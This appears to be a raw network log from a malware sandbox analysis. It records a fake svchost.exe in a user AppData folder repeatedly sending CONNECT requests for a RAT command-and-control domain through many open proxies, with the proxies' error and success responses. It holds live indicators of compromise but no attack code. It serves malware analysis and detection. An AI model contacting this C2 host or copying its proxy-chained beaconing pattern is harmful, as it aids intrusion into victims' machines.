                                                                                    2019192.168.2.55617245.138.87.238108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.532752037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2020192.168.2.55620147.243.205.1312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.535113096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.845927000 CET741INHTTP/1.1 500 Internal Server Error
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 579
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>500 Internal Server Error</title></head><body><center><h1>500 Internal Server Error</h1></center><hr><center>nginx/1.20.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2021192.168.2.556364104.24.35.1528043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.541810036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.696079969 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2022192.168.2.55623160.246.122.2448043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.558490038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2023192.168.2.556211139.198.120.152952743312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.559644938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.380067110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2024192.168.2.556380185.162.228.1708043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.559650898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.717154026 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2025192.168.2.556222128.199.221.915022343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.567362070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.248486996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2026192.168.2.556249116.203.28.438043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.569412947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.223689079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.888257027 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:31 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2027192.168.2.556252147.75.34.861001043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.572278023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.885442019 CET65INHTTP/1.1 200 Connection Established
                                                                                    Proxy-Agent: Zscaler/6.3


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2028192.168.2.55661043.153.71.5844343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.572551966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2029192.168.2.55662043.153.71.5844343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.574327946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2030192.168.2.55662443.153.71.5844343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.575793028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2031192.168.2.55623254.233.119.172312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.575836897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.906328917 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2032192.168.2.55662743.153.71.5844343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.576536894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2033192.168.2.556158119.3.215.41888843220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.581795931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.380240917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.735241890 CET741INHTTP/1.1 500 Internal Server Error
                                                                                    Server: nginx/1.16.1
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 579
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>500 Internal Server Error</title></head><body><center><h1>500 Internal Server Error</h1></center><hr><center>nginx/1.16.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2034192.168.2.55623088.210.20.1442000043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.585078955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.070703030 CET202INHTTP/1.0 404 Not Found
                                                                                    Content-Length: 717
                                                                                    Content-Type: text/html
                                                                                    Date: Sun, 28 Jan 2024 21:35:32 GMT
                                                                                    Expires: Sun, 28 Jan 2024 21:35:32 GMT
                                                                                    Server: Mikrotik HttpProxy
                                                                                    Proxy-Connection: close


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2035192.168.2.55621049.228.131.169500043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.589306116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2036192.168.2.5564271.0.0.138043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.589449883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.746929884 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2037192.168.2.556429104.25.42.1788043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.591007948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.745553970 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2038192.168.2.55629489.38.99.292055143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.597059965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.891771078 CET226INHTTP/1.1 403 Forbidden
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Length: 101
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a
                                                                                    Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2039192.168.2.55626443.131.242.1621567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.610431910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2040192.168.2.55636294.131.60.2065837843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.610847950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.833271027 CET1260INHTTP/1.1 403 Forbidden
                                                                                    Server: squid/6.0.0-20220501-re899e0c27
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 3670
                                                                                    X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                    Vary: Accept-Language
                                                                                    Content-Language: en
                                                                                    Cache-Status: ezproxies.com
                                                                                    Via: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)
                                                                                    Connection: keep-alive
